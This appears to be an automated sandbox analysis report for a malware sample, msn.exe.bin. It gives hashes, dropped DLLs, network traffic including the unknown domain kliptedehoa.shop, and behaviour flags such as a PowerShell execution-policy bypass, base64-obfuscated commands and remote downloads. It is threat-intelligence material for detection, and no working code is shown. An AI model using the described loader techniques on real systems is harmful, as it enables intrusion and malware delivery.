		MD5:F6B40659D575D961EA2E4B0E78BC39A7	SHA256:0BA7CABA0CD30555CFF1CC01ACC4E92DE4E1B076A321A00A5476105EB5C91DB1
5432	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\063XW4EIHYCFSSSZWYXX.temp		binary
		MD5:FF30E6FD2CBE29CC74E8AD9BEE9B88F9	SHA256:BADF169FDA6C08BA8454BA4C6427706C088BB6A690EFBEDF2B6849AAD4C0212F
6436	powershell.exe	C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\Microsoft.Build.Tasks.CodeAnalysis.dll		executable
		MD5:96CD53799793171F96BC702948A229F0	SHA256:458CD882687FA33DF36ED423606C5422C903C39339D5AC708A82D2E3E2AC21C9
5432	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms		binary
		MD5:FF30E6FD2CBE29CC74E8AD9BEE9B88F9	SHA256:BADF169FDA6C08BA8454BA4C6427706C088BB6A690EFBEDF2B6849AAD4C0212F
6436	powershell.exe	C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\Microsoft.Data.Entity.Design.dll		executable
		MD5:47235912034DC9DC0232FD27B39C0A22	SHA256:C72D3AC3425708AF23E19BAE5CBA2699F7D2B3C0E3766CCCD33055654B831D36
6436	powershell.exe	C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\clrjit.dll		executable
		MD5:9AACD65DC0DD646E37210F551C0BBCF8	SHA256:657560246FEF45B29D315A530959D311A35461977B750C4AEEABC2EDC18616C4
6436	powershell.exe	C:\Users\admin\AppData\Local\f8dac2c7-f3cf-499a-87ed-02dee6800c80\Microsoft.NET.Build.Extensions.Tasks.dll		executable
		MD5:F41325BBE09B50707A1622B1DF104714	SHA256:E70CF1285E3E6E6E3ED01AEB9401D9D78FB3DA71FE227346C36D2970F01D2B78

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4712	MoUsoCoreWorker.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	200	2.16.164.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
—	—	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	2.16.164.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
7160	SIHClient.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
7160	SIHClient.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6196	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
4712	MoUsoCoreWorker.exe	2.16.164.120:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
—	—	2.16.164.120:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
4712	MoUsoCoreWorker.exe	88.221.169.152:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
—	—	88.221.169.152:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
5064	SearchApp.exe	2.23.209.187:443	www.bing.com	Akamai International B.V.	GB	whitelisted
4	System	192.168.100.255:138	—	—	—	unknown
—	—	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
—	—	20.190.159.64:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	4.231.128.59	whitelisted
crl.microsoft.com	2.16.164.120 2.16.164.72	whitelisted
www.microsoft.com	88.221.169.152	whitelisted
google.com	216.58.212.174	whitelisted
www.bing.com	2.23.209.187 2.23.209.149 2.23.209.185 2.23.209.148 2.23.209.179 2.23.209.176 2.23.209.182 2.23.209.161 2.23.209.177	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
login.live.com	20.190.159.64 20.190.159.73 20.190.159.23 20.190.159.4 20.190.159.75 40.126.31.71 40.126.31.73 20.190.159.71	whitelisted
go.microsoft.com	184.28.89.167	whitelisted
kliptedehoa.shop	188.114.97.3 188.114.96.3	unknown
slscr.update.microsoft.com	52.149.20.212	whitelisted

Threats

No threats detected

Add for printing

No debug info

General Info

msn.exe.bin

ECD42B9A66A65EB2580D4B217E64D081

B145917F9AD9E4CFD22E4CC2005D1DF1DAB3B808

56F678FFF2C91FB98715F13E55699D5C86DD9F2A595BD5361ADBF554E472A840

192:OsiVEDiMOoUOU+ZIx9RkHOoiR1z3hekLOolAIABXOoEHPuGOGhGmZ:Osiy0ofUSuoizz3huolI+oPhGhGmZ

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

Downloads the requested resource (POWERSHELL)

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

BASE64 encoded PowerShell command has been detected

Writes data to a memory stream (POWERSHELL)

Application launched itself

Base64-obfuscated command line is found

Writes data into a file (POWERSHELL)

Creates new GUID (POWERSHELL)

Process drops legitimate windows executable

Executable content was dropped or overwritten

Drops 7-zip archiver for unpacking

The process drops C-runtime libraries

INFO

Disables trace logs

Gets data length (POWERSHELL)

Checks proxy server information

The sample compiled with russian language support

The process uses the downloaded file

The sample compiled with english language support

The executable file from the user directory is run by the Powershell process

Checks supported languages

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings